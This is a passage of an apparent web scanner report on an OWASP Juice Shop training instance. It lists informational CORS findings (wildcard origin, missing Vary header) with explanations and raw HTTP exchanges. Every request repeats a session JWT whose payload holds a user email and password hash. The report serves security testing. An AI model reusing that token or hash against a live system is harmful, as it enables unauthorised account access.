Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://dnwhusulvoxp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Thu, 02 Apr 2015 15:32:01 GMT
ETag: W/"ceb7-14c7ac2ad68"
Content-Type: application/javascript
Content-Length: 52919
Date: Sun, 15 Jan 2017 21:12:52 GMT
Connection: close

// Underscore.js 1.8.3
// http://underscorejs.org
// (c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
// Underscore may be freely distributed under th
...[SNIP]...
2.36. http://192.168.61.143:3000/css/app.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /css/app.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://zbiykclnarvo.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this stylesheet the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /css/app.css HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zbiykclnarvo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"1a5-15942f0cef8"
Content-Type: text/css; charset=UTF-8
Content-Length: 421
Date: Sun, 15 Jan 2017 21:16:09 GMT
Connection: close

.sidebar {
background: #F3F3F3;
bottom: 0;
position: absolute;
top: 0;
}

.page-header-sm {
margin: 10px 0 20px;
}

.right .github-fork-ribbon {
background-color: #333;
}

.rib
...[SNIP]...
2.37. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://ytyqgpzctyns.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this minified application bundle the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://ytyqgpzctyns.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:13:11 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
2.38. http://192.168.61.143:3000/i18n/en.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /i18n/en.json

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://hkbthndpmeas.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this translation file the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /i18n/en.json HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://hkbthndpmeas.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"1159-15942f0cef8"
Content-Type: application/json
Content-Length: 4441
Date: Sun, 15 Jan 2017 21:16:11 GMT
Connection: close

{
"LANGUAGE":"English",
"NAV_SEARCH":"Search",
"SEARCH_PLACEHOLDER": "Search...",
"NAV_COMPLAIN":"Complain?",
"RIBBON_GITHUB_FORK":"{{fork}} me on {{github}}",
"TITLE_LOGIN":"Login",
"MA
...[SNIP]...
2.39. http://192.168.61.143:3000/i18n/en_US.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /i18n/en_US.json

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://hzvixubfrunt.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that the response is not a JSON translation file: en_US.json does not exist (the English strings are served from /i18n/en.json, entry 2.38 above) and what came back is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8", body opening with the juiceShop ng-app markup), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /i18n/en_US.json HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://hzvixubfrunt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:12 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.40. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/JuiceShop_Logo.svg

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://wfccjohwzeef.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static file such as this logo image the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Request 1

GET /public/images/JuiceShop_Logo.svg HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://wfccjohwzeef.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"9746-15942f0cef8"
Content-Type: image/svg+xml
Content-Length: 38726
Date: Sun, 15 Jan 2017 21:16:29 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/
...[SNIP]...
2.41. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/%7B%7Bproduct.image%7D%7D

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://yljdfiskxduo.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that the path is the URL-encoded form of {{product.image}}, an unrendered AngularJS template binding that the crawler picked up from the page markup rather than a real image, and the response is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8"), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /public/images/products/%7B%7Bproduct.image%7D%7D HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://yljdfiskxduo.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:13:15 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.42. http://192.168.61.143:3000/public/images/products/bower_components/angular-animate/angular-animate.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-animate/angular-animate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://jqwciyfsybwn.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that no such file exists: the path is a bower_components script reference resolved relative to /public/images/products/ (the real libraries are served from /bower_components/, see entries 2.31 to 2.35 above), and the response is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8"), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /public/images/products/bower_components/angular-animate/angular-animate.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://jqwciyfsybwn.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:50 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.43. http://192.168.61.143:3000/public/images/products/bower_components/angular-base64/angular-base64.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-base64/angular-base64.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://izukfgftrsxz.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that no such file exists: the path is a bower_components script reference resolved relative to /public/images/products/ (the real libraries are served from /bower_components/, see entries 2.31 to 2.35 above), and the response is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8"), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /public/images/products/bower_components/angular-base64/angular-base64.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://izukfgftrsxz.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:51 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.44. http://192.168.61.143:3000/public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain: the response carries a fixed Access-Control-Allow-Origin: * rather than echoing the caller's Origin.

The application allowed access from the requested origin http://fvxstdzlecua.com, a randomly generated origin supplied by the scanner; the wildcard answers every origin the same way.

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk. It does not by itself expose authenticated data: a browser withholds a credentialed cross-origin response (one sent with cookies such as the token above, or an Authorization header) from the calling page unless the server echoes that page's origin and also sends Access-Control-Allow-Credentials: true, which a wildcard cannot do. For a public static page such as the application shell this response turns out to be, the wildcard is usually the intended policy.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. CORS cache poisoning, however, needs the cached copy to carry one particular origin in Access-Control-Allow-Origin; a constant * is identical for every requester, so the missing Vary header is a hardening point here rather than an exploitable one. It becomes essential the moment the wildcard is replaced by an origin allowlist.

Note also that no such file exists: the path is a bower_components script reference resolved relative to /public/images/products/ (the real libraries are served from /bower_components/, see entries 2.31 to 2.35 above), and the response is the Angular application shell (Content-Type text/html, 9785 bytes, ETag W/"2639-15942f0cef8"), evidently the catch-all answer for unknown paths. The CORS observation therefore duplicates the one for the shell itself, and this path should not be counted as a separately affected resource.

Request 1

GET /public/images/products/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://fvxstdzlecua.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
